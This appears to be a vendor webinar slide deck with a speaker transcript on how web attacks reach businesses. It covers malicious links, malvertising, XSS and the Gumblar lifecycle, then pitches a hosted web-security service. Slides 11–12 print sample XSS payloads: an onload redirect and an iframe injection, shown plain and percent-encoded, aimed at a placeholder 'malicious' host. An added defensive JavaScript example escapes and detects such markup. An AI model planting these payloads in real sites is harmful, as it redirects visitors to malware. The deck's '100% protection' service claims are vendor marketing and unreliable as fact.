Anatomy Web Attack
Published in: Technology

  • Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today's Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  • Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  • Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues: Productivity, Offensive Materials, Abuse of resources, Malware. Most companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  • Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categories: Bad Links, Advertising, XSS, Gumblar, Web Services. Let’s explore these categories in-depth.
  • Second, IT Managers should consider putting policies in place.
  • Third, IT Managers should consider monitoring their environments.
  • Lastly, IT Managers should be sure they have a malware protection place that is effective.
  • It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.
  • Transcript

    • 1. Anatomy of a Web Attack
    • 2. Agenda
      Challenges Corporations Face
      Web Usage Statistics
      Web Attacks
      Solving the Problem
      MessageLabs Services
    • 3. The Challenge
      The Acme corporation faces a common problem: they want to allow their users business and reasonable personal web access, but they want to make sure that they are protected against the common threats:
      Productivity
      Offensive Materials
      Abuse of resources
      Malware
    • 4. Lots of websites
      Average 2,465 new malware websites per day.
    • 5. Why malware?
      Monetize the attack.
      • Install my software – botnet - spam / DDOS
      • Steal your credentials - bank theft / fraud
      • Steal your data – confidential data / fraud
    • How do you get it?
      Bad Links
      Advertising
      XSS
      Gumblar
      Services
    • 8. Getting Web Malware
      Bad Link
      postcard.jpg.exe
    • 9. Advertise It
      Subvert a legitimate website
      Adverts
    • 10. Fake AV Advert
    • 11. XSS Attack
      User content
      No. Your wrong.
      Duh! Its “you’re”.
      I agree. <img src="/images/smiley.gif"
      onload="document.location='http://malicious/'">
    • 12. XSS IFrame Attack
      http://genuine/index.php?search="'>
      <iframe src="http://malicious"
      height="100%" width="100%">
      </iframe>
      http://genuine/index.php?search="'>
      %3C%69%66%72%61%6D%65%20
      %73%72%63%3D%22%68%74%74
      %70%3A%2F%2F%6D%61%6C%69
      %63%69%6F%75%73%201C%20
      %0A%68%65%69%67%68%74%3D
      %201C%31%30%30%25%22%20
      %77%69%64%74%68%3D%201C
      %31%30%30%25%22%3E%0A%3C
      %2F%69%66%72%61%6D%65%3E%0A
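Added example (not part of the original slides): JavaScript covering the two XSS slides above from the defender's side. It output-encodes user content before display (slide 11) and percent-decodes query parameters before inspecting them, so the encoded iframe is as visible as the plain one (slide 12). Function names and sample inputs are assumptions; the hosts are the slides' placeholders.

```javascript
// Added example, not from the original deck. "genuine" and "malicious" are
// the placeholder hosts from slides 11 and 12; all inputs are constructed.

// Slide 11: encode user content for an HTML text context before output,
// so markup inside a comment is displayed instead of interpreted.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Slide 12: percent-decode until the value stops changing (bounded), so
// plain, encoded and double-encoded payloads are inspected in one form.
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (err) {
      break; // stray "%" (e.g. 100%): keep what has been decoded so far
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Heuristic triage for proxy or web-server logs: report query parameters
// whose decoded value carries an HTML tag or an inline event handler.
const MARKUP = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=/i;
function suspiciousParams(rawUrl) {
  const query = rawUrl.includes('?') ? rawUrl.slice(rawUrl.indexOf('?') + 1) : '';
  const hits = [];
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const name = eq === -1 ? pair : pair.slice(0, eq);
    const decoded = fullyDecode(eq === -1 ? '' : pair.slice(eq + 1));
    if (MARKUP.test(decoded)) hits.push({ name, decoded });
  }
  return hits;
}

// Constructed sample: the slide's iframe with every byte percent-encoded.
const plain = '"\'><iframe src="http://malicious" height="100%" width="100%"></iframe>';
const encoded = Array.from(plain, (c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
console.log(suspiciousParams('http://genuine/index.php?search=' + encoded));
console.log(escapeHtml('I agree. <img src="/images/smiley.gif" onload="...">'));
```

The pattern match is a triage heuristic for logs; the fix for both slides remains encoding user-controlled data at output.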
    • 13. Web Malware
      Malware
      Malicious instructions
      Browser / JS / Flash / PDF
      Complete control
      Victim
      Bad Guy
    • 14. Gumblar Lifecycle
      User visits website with XSS exploit
      User is forwarded to host serving malware
      Malware installed (often flash or PDF)
      Malware steals website logins, forwards to hacker
      Hacker logs into website, installs XSS exploit
    • 15. Gumblar Prevalence
      Up to 60% of all malicious web traffic is Gumblar.
    • 16. How You Can Protect Yourself
    • 17. Controlling the web
      IT Management should first consider controlling the Web;
      Policy engine includes:
      Categorised URL database
      MIME and file type lists
      Time periods
      User and group based policies
      Customizable block messages
      Controls HTTP and HTTPS
    • 18. Building the policy
      No access to travel, leisure and sport between 9am and 5pm
      No access to sex, guns or drugs
      No access to streaming audio and video (reduce bandwidth)
      Only support can download executables
    • 19. Monitoring access
      Dashboard – 1 year of high level information
      Detailed reports up to 6 months of URL and Malware information
      Customizable reports in PDF format
      Scheduled reports sent directly to your inbox
    • 20. Malware Protection
      Scans HTTP and FTP/HTTP traffic
      Multiple signature based AV engines
      Skeptic technology
      Customizable block messages
      Converged analysis
      No noticeable latency
    • 21. You have choices for Web Security
    • 22. Why use hosted services over hardware or software?
    • 23. Why use MessageLabs Services?
      Best Client and Technical Support
      Global Support is 24/7/365 & included with the service
      Support SLA protects your business
      Always get a live person who speaks your language
      Dedicated CSM team
      Best Services
      Award Winning
      Analyst approved
      Backed by strongest SLAs
    • 24. Most Robust Global Infrastructure
      Incorporating 14 data centers spanning four continents
      Every data center is scalable and secured to the highest standards
      Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated
    • 25. Best Service Level Agreements
      Web
      Anti-Virus Protection  100% protection from known and unknown email viruses
      Credit is offered if a client is infected by a virus
      Anti-Virus Protection  100% protection against known viruses
      Credit is offered if a client is infected by a virus
      Email
      Archiving
      Latency  Average scanning time of 100% of web content is within 100 milliseconds
      Credit is offered if latency exceeds 100 milliseconds
      Virus False Positives  0.0001% FP capture rate
      Credit is offered if we do not meet this commitment
      Service Availability  100% uptime
      Credit is offered if availability falls below 100%
      Client may terminate if availability falls below 95%
      Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)
      Credit is offered if we do not meet this commitment
      Support
      Service Availability Guarantee 99.9% uptime for archiving network
      Client may terminate if availability falls below 90%
      Spam False Positives  0.0003% FP capture rate
      Credit is offered if we do not meet this commitment
      Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost
      Latency  Average roundtrip time of 100% of email delivered in less than 60 seconds
      Credit is offered if latency exceeds 1 minute
      Delivery  100% delivery guarantee
      Client may terminate if we do not meet this
      Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs
      Credit is offered if we do not meet this commitment
      Service Availability  100% uptime
      Credit is offered if availability falls below 100%
      Client may terminate if availability falls below 95%
    • 26. Best Shared Intelligence
      Accuracy, Reliability & Performance
      The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.
    • 27. Q&A
      Visit: www.MessageLabs.com
      Phone: 866.460.0000
      Email: Lrothman@MessageLabs.com
    • 28. Special Thanks
      Martin Lee MIET CISSP
      Research & Response Team
      Symantec Hosted Services